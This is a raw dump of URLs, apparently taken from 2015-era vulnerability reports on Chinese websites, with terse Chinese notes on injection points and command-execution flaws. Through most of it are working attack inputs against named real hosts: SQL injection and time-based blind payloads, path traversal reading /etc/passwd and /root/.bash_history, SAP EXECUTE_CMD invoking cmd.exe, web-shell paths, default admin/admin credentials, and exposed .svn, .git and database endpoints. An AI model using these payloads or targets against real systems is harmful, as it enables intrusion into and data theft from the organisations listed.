http://**.**.**.**/sherc/platform/usermanage/checkUnit.jsp?unit= http://**.**.**.**/sherc/platform/resmanage/searchList.jsp?Place=SEARCH&Titles= http://**.**.**.**/Template/Investigate.aspx?ID=34 http://**.**.**.**/system/webos/Template/Interview_result.aspx?ID=15 http://**.**.**.**/Template/Investigate_result.aspx?ID=34 http://**.**.**.**/system/webos/Template/Interview_result.aspx?ID=15 http://**.**.**.**/html/personal/Search_List3.asp?zw=1900&page=2 http://**.**.**.**/html/personal/passwordsave.asp http://**.**.**.**/html/news/article.asp?cid=18&top=6&asize=13 http://**.**.**.**/html/company/com_search_list.asp http://**.**.**.**/3G/ccompanynew.asp?cid=664552 http://**.**.**.**/html/news/article.asp?cid=18&top=30&asize=12&isdt=y http://221.192.235.83:3001/index.aspx http://passport.voc.com.cn http://fl.weihai.tv/city/weiHai/job.php?job=allnewinfo&rows=16&leng=&iframeID=allnewinfo http://cemftp.ce-air.com/yyoa/index.jsp http://wisdom.120.net/m 
http://**.**.**.**/blog/my/module/definde/ArticleList.jsp?blog_id=&module_id=482 http://**.**.**.**/blog/my/module/definde/ViewArticle.jsp?blog_id=&ArticleId=127 http://**.**.**.**/blog/my/module/news/ViewNews.jsp?blog_id=&NewsId=351 http://**.**.**.**/sendMail.do http://**.**.**.**/Blog/InitMess http://**.**.**.**/SyntInquiry/SyntInquiry_Ajax.jsp http://**.**.**.**/bugs/wooyun-2015-0131525 http://www.changan-mazda.com.cn/excellenceplan/position?type=&keyword=3 http://www.changan-mazda.com.cn/search?q=Mazda3%20AXELA&t=1 http://211.154.173.238/console/ http://**.**.**.**/WFManager/loginAction_getCheckCodeImg.action http://**.**.**.**/App_Site/SiteSearch.aspx?Title=123 http://**.**.**.**/App_Site/SiteSearch.aspx?Title=123 http://**.**.**.**/App_Site/SiteSearch.aspx?Title=123 http://**.**.**.**/App_Site/SiteSearch.aspx?Title=123 http://**.**.**.**/App_Site/SiteSearch.aspx?Title=123 http://**.**.**.**/App_Site/SiteSearch.aspx?Title=123 http://**.**.**.**/App_Site/SiteSearch.aspx?Title=123 http://**.**.**.**/index.php?m=column&a=getcolumn&channel=107 http://**.**.**.**/index.php?m=column&a=getcolumn&channel=107 http://mall.chexun.com/admin/friend_upfile.html http://www.m5.baidu.com手机端存在xss漏洞 http://**.**.**.**/lp.php?mc=1&sort_id=42&suozai=1&tp=1 http://**.**.**.**/n.php?p_id=5&sort_id=44&tp=0 http://**.**.**.**/download.php?url=任意文件 http://**.**.**.**/jyuserinfo.php?id=111568'%20and%201%3d2%20and%20'a'%3d'a http://10jia.letv.com/ http://vip.ufida.com.cn/Frame/Index.aspx http://vip.ufida.com.cn/RepositorySearchInfo/DoctInfo.aspx?ReposID=38d4a08e-8b79-4de7-8566-30aecfb1d56f http://vip.ufida.com.cn/RepositorySearchInfo/DoctList.aspx?Type=MainPageClick http://gti.ailvxing.com/skin/ailvxing/js/ask.min.js?v=201500318 http://**.**.**.**/search/prosearch.aspx?atid=3767&brand=3770&brandname=%B9?&selected=amonyup&sort=2&sort1=1 http://**.**.**.** http://**.**.**.**/TryDown.htm http://**.**.**/Lesktop/sendfile.aspx http://**.**.**//Lesktop/sendfile.aspx 
http://**.**.**//Lesktop/sendfile.aspx http://**.**.**//Lesktop/sendfile.aspx http://**.**.**/Lesktop/sendfile.aspx http://**.**.**//Lesktop/sendfile.aspx http://**.**.**//Lesktop/sendfile.aspx http://**.**.**/Lesktop/sendfile.aspx http://**.**.**//Lesktop/sendfile.aspx http://**.**.**/Lesktop/sendfile.aspx http://**.**.**//Lesktop/sendfile.aspx http://**.**.**/Lesktop/sendfile.aspx http://**.**.**//Lesktop/sendfile.aspx http://**.**.**/Lesktop/sendfile.aspx http://**.**.**/Lesktop/sendfile.aspx http://**.**.**//Lesktop/sendfile.aspx http://**.**.**/Lesktop/sendfile.aspx http://**.**.**/Lesktop/sendfile.aspx http://**.**.**/Lesktop/sendfile.aspx http://**.**.**/Lesktop/sendfile.aspx http://**.**.**/Lesktop/sendfile.aspx http://**.**.**/Lesktop/sendfile.aspx http://**.**.**/Lesktop/sendfile.aspx http://**.**.**/Lesktop/sendfile.aspx http://**.**.**/Lesktop/sendfile.aspx http://**.**.**/Lesktop/sendfile.aspx_ http://**.**.**/Lesktop/sendfile.aspx http://**.**.**/Lesktop/sendfile.aspx http://**.**.**/Lesktop/sendfile.aspx http://**.**.**/Lesktop/sendfile.aspx http://**.**.**/Lesktop/sendfile.aspx_ http://**.**.**//Lesktop/sendfile.aspx_ http://**.**.**//Lesktop/sendfile.aspx http://**.**.**//Lesktop/sendfile.aspx http://**.**.**//Lesktop/sendfile.aspx http://**.**.**//Lesktop/sendfile.aspx_ http://**.**.**/Lesktop/sendfile.aspx_ http://**.**.**//Lesktop/sendfile.aspx http://**.**.**//Lesktop/sendfile.aspx_ http://**.**.**//Lesktop/sendfile.aspx http://**.**.**//Lesktop/sendfile.aspx http://**.**.**/Lesktop/Upload.aspx官网demo_ http://**.**.**//Lesktop/Upload.aspx鸡泽县人口和计划生育局_ http://**.**.**//Lesktop/Upload.aspx将乐县司法综合服务大平台_ http://**.**.**//Lesktop/Upload.aspx广西动物卫生监督所_ http://**.**.**/Lesktop/Upload.aspx余姚辰茂河姆渡酒店_ http://**.**.**//Lesktop/Upload.aspx中航计量所_ http://**.**.**//Lesktop/Upload.aspx济宁广汇汽车销售服务有限公司_ http://**.**.**/Lesktop/sendfile.aspx http://**.**.**//Lesktop/Upload.aspx渝中教研网_ http://**.**.**/Lesktop/Upload.aspx厦门夏商百货集团_ http://**.**.**//Lesktop/Upload.aspx_ 
http://**.**.**/Lesktop/Upload.aspx_ http://**.**.**//Lesktop/Upload.aspx_ http://**.**.**/Lesktop/sendfile.aspx http://**.**.**/Lesktop/Upload.aspx_ http://**.**.**//Lesktop/Upload.aspx_ http://**.**.**/Lesktop/Upload.aspx http://**.**.**/Lesktop/Upload.aspx http://**.**.**/Lesktop/Upload.aspx_ http://**.**.**/Lesktop/Upload.aspx_ http://**.**.**/Lesktop/Upload.aspx_ http://**.**.**/Lesktop/Upload.aspx http://**.**.**/Lesktop/sendfile.aspx http://**.**.**/Lesktop/Upload.aspx_ http://**.**.**/Lesktop/Upload.aspx_ http://**.**.**/Lesktop/sendfile.aspx_ http://**.**.**/Lesktop/sendfile.aspx http://**.**.**/Lesktop/Upload.aspx-_ http://**.**.**/Lesktop/Upload.aspx_ http://**.**.**/Lesktop/Upload.aspx_ http://**.**.**/Lesktop/sendfile.aspx_ http://**.**.**//Lesktop/sendfile.aspx_ http://**.**.**//Lesktop/Upload.aspx_ http://**.**.**//Lesktop/Upload.aspx_ http://**.**.**//Lesktop/Upload.aspx_ http://**.**.**//Lesktop/sendfile.aspx_ http://**.**.**/Lesktop/sendfile.aspx_ http://**.**.**//Lesktop/Upload.aspx_ http://**.**.**//Lesktop/sendfile.aspx_ http://**.**.**//Lesktop/Upload.aspx_ http://**.**.**//Lesktop/Upload.aspx http://**.**.**.**/admin.aspx?s=adminlogin username:admin password:admin http://soccer.m.sohu.com/GlobalSoccerCenter/Reception/InceludSchedule?dateTime=2015-10-21 https://**.**.**.**/sidy-git/CIB-CRS/blob/6cc76d4ff724f30cfe127e7e5c9d1fa7365978fd/readme.txt https://**.**.**.**/advanced/advanced?action=dev&t=advanced/dev&token=287168589&lang=zh_CN AppID:wxe90f57504d4944c9 http://**.**.**.**/cib_crs http://www.vip.com/beauty.php?cid=9&stock=9&order=9&page=9 http://**.**.**.**:8090/searchServer/menu/index.do http://zjc.sicnu.edu.cn/zjc-career-websys-2009/zjc-career/sd_zjc_career_login_admin.aspx http://**.**.**.**:188/default.asp http://**.**.**.**:188/too1/getpwd.asp?user=admin http://**.**.**.**/WebVehicleInspection/ http://**.**.**.**/WebVehicleInspection/Admin/login.jsp http://yun.admin5.com www.acunetix-referrer.com http://shop.hsw.cn 
http://**.**.**.**/Backstage/ http://**.**.**.**/searchbug.php http://**.**.**.**/mmcadmin/ http://**.**.**.**/themes/1321599208/info.php。日期是2015-09-19 http://**.**.**.**/bugs/wooyun-2015-0126451 http://www.now.cn:80/ www.now.cn http://i.muzhiwan.com/.svn/entries http://user.muzhiwan.com/.svn/entries http://www.lvmama.com/lvyou/d-hongcun100477.html http://59.151.27.143/login.jsp http://wooyun.org/bugs/wooyun-2015-0118137 http://www.bkzs.sdu.edu.cn/schoolday/serch/ https://**.**.**.**/manager/html http://**.**.**.** http://**.**.**.**:8822/ https://**.**.**.**/uc-oauth/rest/relatedacctlogin/ https://**.**.**.** http://**.**.**.**:8822/inpayCustomer/ http://**.**.**.**:8822/inpayCustomer/ http://customer.hiiir.com/.svn/entries http://buzz.hiiir.com/.svn/entries http://bike.hiiir.com/.svn/entries http://ad.hiiir.com/.svn/entries https://60.199.208.111/.svn/entries http://buzz.hiiir.com/.svn/entries http://customer.hiiir.com/.svn/entries http://data.hiiir.com/.svn/entries http://event.hiiir.com/.svn/entries http://family.hiiir.com/.svn/entries http://fb.hiiir.com/.svn/entries http://flash.hiiir.com/.svn/entries http://hero.hiiir.com/.svn/entries http://log.hiiir.com/.svn/entries http://manager.hiiir.com/.svn/entries http://mo.hiiir.com/.svn/entries http://media.hiiir.com/.svn/entries http://partners.hiiir.com/.svn/entries http://pay.hiiir.com/.svn/entries http://ping.hiiir.com/.svn/entries http://store.hiiir.com/.svn/entries http://style.hiiir.com/.svn/entries http://time.hiiir.com/.svn/entries http://**.**.**.**/index.php?m=content&c=diy&a=member_lists_ajax&typeid=1&groupid= http://yingke.cn/product/moviecard.aspx?cityid=11 http://www.gkzj.com/news_show.php?id=385 http://www.gkzj.com/news_show.php?id=385 jdbc:oracle:thin:@**.**.**.**:1521:abwsdj https://**.**.**.**/dfsq1311/wechat http://**.**.**.**/index http://**.**.**.**/bugs/wooyun-2010-0134796 http://**.**.**.**/Data/ http://**.**.**.**/includes/ http://**.**.**.**/Test/ http://**.**.**.**/manager 
jdbc:oracle:thin:@**.**.**.**:1521:orcl http://interface.api.haodai.com/capi/Ask/getTopTags http://**.**.**.**/coremail/index.jsp http://cxb.chexiang.com/service/peccancy/getPeccancyInfo/2 http://car.itjuzi.com http://icar.cqins.com:8080/login.action http://**.**.**.**/teenspecial/nathan100/details.php?id=32 http://**.**.**.**/teenspecial/nathan100/details.php?id=32 http://**.**.**.**/info_show.php?id=1014 http://**.**.**.**/picture_show.php?id=2098 http://**.**.**.**/search.php?area=title&keyword=1&page=3 http://au.umeng.com/api/check_app_update http://**.**.**.**/ http://**.**.**.**/sts/stsIndex/testIndex/articleView.action?articleId=1439450298756&dictId=1341139113981449也存在命令执行漏洞 http://photo.hsw.cn/work/getRecommendWork?id=10037&p=1 http://**.**.**.**/site/frontpage/paihang/Ranking.action?category=1200912281003300007存在命令执行漏洞 http://**.**.**.**/bugs/wooyun-2010-065153 http://www.moretv.com.cn/.git/config cn:account/officialWebsite.git www.lvmama.com http://www.lvmama.com https://**.**.**.**/fishcy521/tdd_test/blob/cb00ec08f2137c9c27ca9da30c3a3631e8e360f5/tdd-rms/src/main/java/com/rms/commons/dbcp/EmailFactory.java http://**.**.**.**:8080/com.drkj.faceRecog/action/frontPage/passport/workerLoginGet.action存在命令执行漏洞 http://survey.minanins.com:9001/ http://survey.minanins.com:9001/console http://survey.minanins.com:9001/JspSpyJDK5/JspSpyJDK5.jsp ftp://**.**.**.**/ http://gateway.minanins.com:9001 http://gateway.minanins.com:9001/console http://gateway.minanins.com:9001/jay/jay.jsp http://**.**.**.**:50000/ctc/servlet/com.sap.ctc.util.ConfigServlet?param=com.sap.ctc.util.FileSystemConfig;EXECUTE_CMD;CMDLINE=cmd.exe http://180.153.17.43:50000/ctc/servlet/com.sap.ctc.util.ConfigServlet?param=com.sap.ctc.util.FileSystemConfig;EXECUTE_CMD;CMDLINE=cmd.exe http://180.153.17.43/names.nsf http://service.sangfor.com/monitor/ http://service.sangfor.com/monitor/index_server.php?nd=1445488102899 http://dealer.chexun.com/admin/index.aspx display:none display:none display:none 
display:none display:none display:none display:none http://**.**.**.**/collegesdynamic.html http://**.**.**.**/jobfairs.html http://**.**.**.**/jobguide.html http://**.**.**.** http://**.**.**.**/notice.html http://**.**.**.** http://**.**.**.**:80/ http://**.**.**.**/lm/front/api/opr_datacall.jsp?fn_billstatus=E&vc_id=1 http://**.**.**.**/lm/front/api/opr_datacall.jsp?fn_billstatus=E&vc_id=1 http://**.**.**.**/lm/front/api/opr_datacall.jsp?fn_billstatus=E&vc_id=1 http://**.**.**.**:82/lm/front/api/opr_datacall.jsp?fn_billstatus=E&vc_id=1 http://**.**.**.**/card.php?id=1 cdn.admin5.com/dns.aspx?tn=122150091 cdn.admin5.com/dns.aspx?tn=122150091 http://www.cetools.cn/index.php/cetools/login http://www.cetools.cn/index.php/cetools_admin/login http://**.**.**.**/script/syslogin.php http://wlgl.dfl.com.cn/dfqcmy/admin/newsadmin.asp?AdminType=9 http://db.cate.hsw.cn http://interface.api.haodai.com/bapi/OrderDeal/getOrderList http://**.**.**.**/unit.aspx?userid=6643ca6c-66f4-4297-a0b7-45c17687efc3 http://**.**.**.**/search/ http://update.funshion.com/login/index.php?c=login&a=login&so=begin http://**.**.**.**/userLogin!loginWithoutCode.action http://**.**.**.**/Announce.asp?ChannelID=1看图 http://www.ahhailiang.com.cn/news_list.php?act=13%27 http://203.130.41.40:6180/jsp/main.jsp http://www.huozhan.com/SupplierItemCate_searchProductList.do?SUPPLIER_CODE=010375&AREA_CODE=010BJ http://ccw.infinitus.com.cn/hollycrm/login.jsp http://ccw.infinitus.com.cn/foo1/index.jsp http://**.**.**.**/hd/jlzzds/index.html http://panpan.efotile.com/website/Default.aspx uid:kf_9729_ISME9754_264,tid:1445472411226812 http://panpan.efotile.com/SNSClub/Club_SeniorApplyEdit.aspx?id=621 http://bbs.chexun.com/api/userfav.php?uid=null&type=2&id=3004&callback=collectStatus2&m=getishave http://**.**.**.**/ http://**.**.**.**/ http://**.**.**.**/ http://**.**.**.**/ http://**.**.**.**/ http://**.**.**.**/ http://help.letvcloud.com/Login.jsp?redirect=Main http://www.jkxg.zjut.edu.cn/loginAction!logon 
http://**.**.**.**/coremail/index.jsp http://111.161.24.187/adm/ http://111.161.24.187/adm/.svn/entries http://**.**.**.**/注入点参数weikeID http://**.**.**.**/District/MicroLessonVideoPlaying/MicroLessonVideoPlay.aspx?weikeID=2294&videoID=14afc08b-0bde-44fd-8e7f-e2907e4c42b4&fid=6526 http://**.**.**.**/info.php?action=about&sortName=about_4 http://www.hdpower.net http://www.hdpower.net/journalx/editorInChiefLogOn.action?mag_Id=1 http://dz2th.300.cn/02/first/video_detail.asp?id=331 http://dz2th.300.cn/02/first/pwticket.asp?id=314 http://dz2th.300.cn/02/first/upps.asp?formname=form1&editname=webpic2 http://**.**.**.**:1000/ http://**.**.**.**/ http://183.62.40.31/defaultroot/work_flow/formOptJSPUpload.jsp?flag=1 http://183.62.40.31/defaultroot/work_flow/mkzy.jsp http://183.62.40.31/jmx-console/ http://www.bkzs.sdu.edu.cn/queryadmit?examno=%27xor%28if%28now%28%29=sysdate%28%29%20and%20ascii%28mid%28@@datadir,1,1%29%29%3E1,sleep%281%29,1%29%29or%27b&idcard=e&name=c&year=2015&tn=monline_4_dg http://**.**.**.**/JspFron/twopage.jsp?type=1&infoid=150206145145 http://**.**.**.**:802/admin/sch/print/dad_print?page=964# http://yun.admin5.com www.acunetix-referrer.com http://**.**.**.**/ http://shop2.csdn.net/ http://shop2.csdn.net/flow.php?step=consignee&direct_shopping=1 index.php/welcome http://**.**.**.**/ http://**.**.**.**/kjxxw.php?id=112815 http://**.**.**.**/bf.zip http://jiang.178.com/这个接口好像是178旗下一款游戏的登录接口,登录位置没有验证码没有限制 http://www.yiliysr.com/cms/memberlist.php http://asc.ecnu.edu.cn/ http://asc.ecnu.edu.cn/admin/index.php http://sxd.178.com/大斗魂游戏登录的地方没有登录错误次数IP之类的限制,用户名密码明文传输的,感觉可以撞库用户的 http://**.**.**.**/201415_hist6011d.html?id=2706 http://**.**.**.**/201415_hist6011d.html?id=2706 index.php/site/login http://sfzx.nwpu.edu.cn:80/jisuanji/reform_1.asp?id=1 http://sfzx.nwpu.edu.cn:80/jisuanji/synopsis4_1.asp?id=2 http://sfzx.nwpu.edu.cn:80/wuli/shownews.asp?art_id=3 http://183.62.40.31/defaultroot/work_flow/formStartJSPUpload.jsp 
http://183.62.40.31/defaultroot/netdisk/download_netdisk.jsp?path=1&fileName=../../WEB-INF/web&fileExtName=xml&fileSaveName=x http://183.62.40.31/defaultroot/information_manager/informationmanager_download.jsp?path=..&FileName=WEB-INF/web.xml&name=x http://**.**.**.**/ http://**.**.**.**/personal/reg/my_regone.jsp http://**.**.**.**/personal/reg/my_regone.jsp www.lvmama.com http://www.lvmama.com http://**.**.**.**/index.html http://**.**.**.**/member/resetPwd.action http://sinopharmd.com/info_detail.asp?id=56 http://user.ihaier.com/login?service=http%3A%2F%2Fwww.ihaier.com%2FPassport%2Findex%2Findex http://**.**.**.**/ http://**.**.**.**/gentleCMS/login/login.do http://oa.120.net/login/ http://**.**.**.**/info.php?code=000300040004 http://114.141.166.196:7001/adp/login_new.jsp?popup=false http://114.141.166.196:7001/console/login/LoginForm.jsp http://114.242.113.96:7001/uddiexplorer/SearchPublicRegistries.jsp?operator=http://localhost:7002&rdoSearch=name&txtSearchname=sdf&txtSearchkey=&txtSearchfor=&selfor=Businesslocation&btnSubmit=Search http://103.47.87.72:7001/otcwms/security/loginInit.action http://aaa.daojia.com.cn/food_search.php?r=5069&a=1&char=Y http://**.**.**.**/aboutus/webnewslist5.asp?typeid=9 http://**.**.**.**/aboutus/webnewslist5.asp?typeid=8%2b1 http://eduadmin.open.com.cn/login.aspx ftp://14.17.122.200 ftp://14.17.122.200/web/Systool/autoftp/task.ini http://**.**.**.**/admin/login http://dbr-bulk-shared-b-atc.evip.aol.com/xmlrpc http://my.oppo.com/auth/login?callback=http://store.oppo.com/user/orders www.52000000@qq.com www.350948926@qq.com http://**.**.**.**/InformationCat.aspx?newsType=030106 http://**.**.**.**/MyShowCat.aspx?newsType=01 ftp://**.**.**.**/dbback/ http://www.zf_**.**.**.**/GetStuCheckinInfo soap:Envelope xmlns:xsi="http://**.**.**.**/2001/XMLSchema-instance xmlns:xsd="http://**.**.**.**/2001/XMLSchema xmlns:soapenc="http://**.**.**.**/soap/encoding/ xmlns:tns="http://**.**.**.**/ xmlns:types="http://**.**.**.**/encodedTypes 
xmlns:soap="http://**.**.**.**/soap/envelope/ soap:Body soap:encodingStyle="http://**.**.**.**/soap/encoding/ q1:GetStuCheckinInfo xmlns:q1="http://www.zf_**.**.**.**/GetStuCheckinInfo xsi:type="xsd:string xsi:type="xsd:string xsi:type="xsd:string q1:GetStuCheckinInfo soap:Body soap:Envelope xsi:type="xsd:string xsi:type="xsd:string xsi:type="xsd:string jdbc:oracle:thin:@**.**.**.**:1521/HGK http://interface.api.haodai.com/capi/XdyComment/getDetail http://**.**.**.**/tw/ForumDetail.php?DSCDOCTYPID=0kzokc61n8lc4fj8&DSCDOCID=00c7od2x3fbmhaj8 http://**.**.**.**/tw/ForumDetail.php?DSCDOCTYPID=0kzokc61n8lc4fj8&DSCDOCID=00c7od2x3fbmhaj8 http://180.168.192.54/axatp/login.do http://www.infinitus-int.com/.svn/entries http://**.**.**.**:9090/trilink/expert_LoginExpert_toLogin_n.action存在命令执行漏洞 http://**.**.**.**:9090/trilink/sysmanage_Login_doLoginOut_n.action http://**.**.**.**:9090/trilink/expert_LoginExpert_toLogin_n.action存在post注入 https://ihome.cofco.com htts://mail.ihome.cofco.com http://nc.cofco.com http://interface.api.haodai.com/bapi/Xdq/getUserInfo http://**.**.**.**:8090/vj/admin/classGroup/addBook.aspx http://**.**.**.**/vj/admin/classGroup/addBook.aspx http://**.**.**.**/admin/classGroup/addBook.aspx http://Campus.Dianhun.Cn/ http://Campus.Dianhun.Cn/是Apache的。 http://Mpl.M3guo.Com/admincp.php?mod=login http://sso.17m3.com/ http://pay.17m3.com/ http://i.17m3.com/ http://passport.m3guo.com/ http://**.**.**.**/oa/letterAction.do?step=studentLetterQuery&id= http://open.muzhiwan.com:80/ http://**.**.**.**/eassso/login http://**.**.**.**/about.asp?id=23 http://**.**.**.**/khal.html http://**.**.**.**/wcm/customform/list?projectid=50 http://**.**.**.**/wcm/customform/list?projectid=148 http://**.**.**.**/wcm/customform/list?projectid=341 http://**.**.**.**/wcm/customform/list?projectid=687 http://**.**.**.**/wcm/customform/list?projectid=182 http://**.**.**.**/wcm/customform/list?projectid=160 http://**.**.**.**:8002/wcm/customform/list?projectid=612 
http://**.**.**.**/wcm/customform/list?projectid=151 http://**.**.**.**/wcm/customform/list?projectid=28 http://**.**.**.**/wcm/customform/list?projectid=314&SFGK=%E6%98%AF&State=3 http://**.**.**.**/wcm/customform/list?projectid=592 http://**.**.**.**:8080/CMS/content/previewArticle.action存在命令执行漏洞 http://hereci.haier.com/ http://**.**.**.**/news/read_news.php?nid=1357 http://**.**.**.**/news/read_news.php?nid=1357 http://oa.tsinghua-zj.edu.cn/jsoa/login.jsp http://**.**.**.**/ http://oa.tongji.edu.cn/messager/users.data http://oa.tongji.edu.cn/login/Login.jsp?logintype=1 http://oa.tongji.edu.cn:89/login.do?message=103&verify= http://**.**.**.**/articlelist.asp?sp=False&classtype=article&big=%D1%A7%D0%A3%B8%C5%BF%F6 http://**.**.**.**/articlelist.asp?sp=False&classtype=article&big=%D1%A7%D0%A3%B8%C5%BF%F6 http://**.**.**.**/articlelist.asp?sp=False&classtype=article&big=%D1%A7%D0%A3%B8%C5%BF%F6 http://**.**.**.**/articlelist.asp?sp=False&classtype=article&big=%D1%A7%D0%A3%B8%C5%BF%F6 http://**.**.**.**/articlelist.asp?sp=False&classtype=article&big=%D1%A7%D0%A3%B8%C5%BF%F6 http://oa.szahotel.com/c6/JHSoft.Web.Login/GetPassWord.aspx?flag=getEmail&UserName=1111 http://www.shenzhenair.com/module/.svn/entries http://www.shenzhenair.com/module/wshdp/.svn/entries http://www.shenzhenair.com/ticketBookingFlow/.svn/entries http://atmsp.whut.edu.cn/admin/show.php?dno=3720 http://**.**.**.**/search?keyword=aaa http://**.**.**.**/kjzb/aqkj/201111/t20111125_189483.htm http://book.huatu.com/z.zip; http://tiku.huatu.com/cdn.tar.bz2; http://zw.huatu.com/zhiwei2015.tar http://zw.huatu.com/buweisearch.tar http://book.huatu.com/z.zip http://tiku.huatu.com/cdn.tar.bz2 http://zw.huatu.com/zhiwei2015.tar http://zw.huatu.com/buweisearch.tar http://oa.gtadata.com/C6//Jhsoft.Web.login/NewView.aspx?ID=1 http://**.**.**.**/bugs/wooyun-2015-0137257 http://**.**.**.**/login.aspx http://dingzhi.8684.cn/ajax.php?act=line_book_num_with_me&ecity=shanghai%22 http://admin.300.cn/login.html 
http://**.**.**.**/orgstuff/index.php?code=list&ids=1&launage=gb http://**.**.**.**/orgstuff/index.php?code=list&ids=1&launage=gb http://61.158.140.6/colorring/manager/ring_user/myTimeRing_day.jsp?craccount=11111111111&isCrm=0&pright=1-6 UserName:admin http://www.senhuayun.com/index.action http://**.**.**.**/bugs/wooyun-2010-098676 http://**.**.**.**/bsznlist.php?sid=14 http://**.**.**.**/info.php?id=1 http://117.121.20.237:8080/ http://117.121.20.238:8080/ http://117.121.20.239:8080/ http://117.121.20.240:8080/ http://117.121.20.241:8080/ http://117.121.20.242:8080/ http://117.121.20.243:8080/ http://117.121.20.244:8080/ http://117.121.20.228:8080/login.do http://117.121.20.245:8080/login.do http://117.121.20.246:8080/login.do http://117.121.20.247:8080/login.do http://117.121.20.248:8080/index.do http://117.121.20.249:8080/index.do http://117.121.20.250:8080/index.do http://117.121.20.251:8080/index.do http://117.121.20.242:8080/index.do http://**.**.**.**:8090/ http://**.**.**.**/ http://**.**.**.**:8090/vj/admin/classGroup/xyDonateMoneyAdd.aspx http://**.**.**.**:8090/vj/admin/classGroup/activeRecAdd.aspx http://**.**.**.**:8090/vj/admin/classGroup/activeRecEdit.aspx http://**.**.**.**:8090/vj/admin/Practice/AddHortationPunish.aspx http://**.**.**.**:8090/vj/admin/Practice/AddPatrol.aspx http://**.**.**.**:8090/vj/admin/ReportCard/Add.aspx http://**.**.**.**:8090/vj/admin/ReportCard/AddReport.aspx http://**.**.**.**:8090/vj/admin/ShortMessage/Iframe_TelSend.aspx http://**.**.**.**:8090/vj/Graduate/classGroup/addBook.aspx http://**.**.**.**:8090/vj/PublicModule/MessageManage/AdminMsg.aspx http://**.**.**.**:8090/vj/PublicModule/MessageManage/Iframe_Admin.aspx http://**.**.**.**:8090/vj/PublicModule/MessageManage/Iframe_Emp.aspx http://**.**.**.**:8090/vj/PublicModule/MessageManage/Iframe_StuSend.aspx http://**.**.**.**:8090/vj/PublicModule/MessageManage/StudentMsg.aspx http://**.**.**.**:8090/vj/Website/certificate.aspx 
http://**.**.**.**:8090/vj/Website/stu.aspx http://**.**.**.**:8090/vj/admin/classGroup/addressBook.aspx http://**.**.**.**:8090/vj/admin/classGroup/notedAlumnus.aspx http://**.**.**.**:8090/vj/admin/classGroup/xyDonateMoneyManage.aspx http://**.**.**.**:8090/vj/admin/classGroup/xyDonateMoneyManageEdit.aspx http://**.**.**.**:8090/vj/admin/WebsiteManage/VideoMag.aspx http://eduadmin.openonline.com.cn/BasicSystem/Teaching/Tplan_Material_DetailNew.aspx?MaterialOwnerShipID=4&RecruitBatchID=4701&LevelID=0&SpecialityID=0&universitycode=10006&UniversityName= http://**.**.**.** http://**.**.**.**/ http://**.**.**.**/admin http://**.**.**.**:81/GetPasswdCfm.asp?USERACCOUNTID=1 http://**.**.**.**/Dlib/GetPasswdCfm.asp?USERACCOUNTID=1 http://**.**.**.**/Dlib/GetPasswdCfm.asp?USERACCOUNTID=1 http://**.**.**.**/Dlib/GetPasswdCfm.asp?USERACCOUNTID=1 http://**.**.**.**:8080/Dlib/GetPasswdCfm.asp?USERACCOUNTID=1 http://**.**.**.**/Dlib/GetPasswdCfm.asp?USERACCOUNTID=1 http://**.**.**.**:82/GetPasswdCfm.asp?USERACCOUNTID=1 http://**.**.**.**:81//GetPasswdCfm.asp?USERACCOUNTID=1 http://wap.8684.cn http://203.130.41.108/ http://**.**.**.**:801/t.aspx?i=20140910170019-881396-00-000 http://**.**.**.**:8088/t.aspx?i=20150617100937-919003-00-000 http://**.**.**.**/zfxxgk/t.aspx?i=20151014111008-156445-00-000 http://**.**.**.**:888/t.aspx?i=20150914172216-299655-00-000 http://**.**.**.**:8080/t.aspx?i=20150707120539-594438-00-000 http://**.**.**.**/t.aspx?i=20080620113741-751258-00-000 http://**.**.**.**/t.aspx?i=20131207234443-184446-00-000 http://**.**.**.**/t.aspx?i=20150807093523-405968-00-000 http://**.**.**.**/website/t.aspx?i=20150928161618-368289-00-000 http://**.**.**.**/bugs/wooyun-2015-0148559 http://**.**.**.**/system/Default.aspx,输入万能密码 http://**.**.**.**/website/sublist/newssublist.aspx?mkid=62 http://mail.jlbank.com.cn/ http://**.**.**.**:8001/lianlife/logon/main.jsp http://**.**.**.**:8001/lianlife/f1print/F1PrintKernelJ1.jsp?&RealPath=/etc/passwd 
http://219.232.237.70:8082/ http://219.232.237.70:8080/resin-doc/resource/tutorial/jndi-appconfig/test?inputFile=/etc/passwd http://219.232.237.70:8080/resin-doc/resource/tutorial/jndi-appconfig/test?inputFile=/root/.bash_history http://219.232.237.70:8080/resin-doc/resource/tutorial/jndi-appconfig/test?inputFile=http://192.168.1.14/login.jsp http://yun.admin5.com www.acunetix-referrer.com http://www.health.taikang.com/sbt/indexlis.jsp www.health.taikang.com/sbt/logon/menu.jsp?userCode=admin&Ip=123&nodecode=123 http://x.1mxian.com/bonus/id/40030097 http://x.1mxian.com/bonus/id/40030096 http://x.1mxian.com/bonus/id/40030095 http://x.1mxian.com/bonus/id/40030094 http://hq.fruitday.com:88/messager/users.data http://hq.fruitday.com:89/login.do http://hq.fruitday.com:88/login/Login.jsp?logintype=1 http://oa.52mf.cn/messager/users.data http://oa.52mf.cn:89/login.do http://oa.52mf.cn/login/Login.jsp?logintype=1 http://eip.crcchem.com/messager/users.data http://eip.crcchem.com/login/Login.jsp?logintype=1 http://eip.crcchem.com:89/login.do http://beijing.daojia.com.cn/index.html http://**.**.**.**/bugs/wooyun-2010-0116977 http://**.**.**.**/kfweb/hot.aspx?mid1=0005&mid2=0002&webid=2 http://**.**.**.**/querynetweb/hot.aspx?mid1=0005&mid2=0002&webid=2 http://**.**.**.**/kefa/hot.aspx?mid1=0001&mid2=0005&webid=2 http://**.**.**.**:8080/KfWeb/hot.aspx?mid1=0001&mid2=0005&webid=2 http://**.**.**.**/bugs/wooyun-2010-0120901 http://**.**.**.**/dlib/Books.asp?BOOKTYPE=1&BOOKSCLASSID=16 http://**.**.**.**/dlib/Books.asp?BOOKTYPE=1&BOOKSCLASSID=16 http://**.**.**.**/dlib/Books.asp?BOOKTYPE=1&BOOKSCLASSID=16 http://**.**.**.**:8080/dlib/Books.asp?BOOKTYPE=1&BOOKSCLASSID=16 http://**.**.**.**:8080/dlib/Books.asp?BOOKTYPE=1&BOOKSCLASSID=16 com:6379 com:6379 http://cn.hx.travelsky.com:80/hxuo/index.jsp http://*/logon/menu.jsp?userCode=admin&Ip=123&nodecode=123 http://**.**.**.**/ http://**.**.**.**/logon/menu.jsp?userCode=admin&Ip=123&nodecode=123 
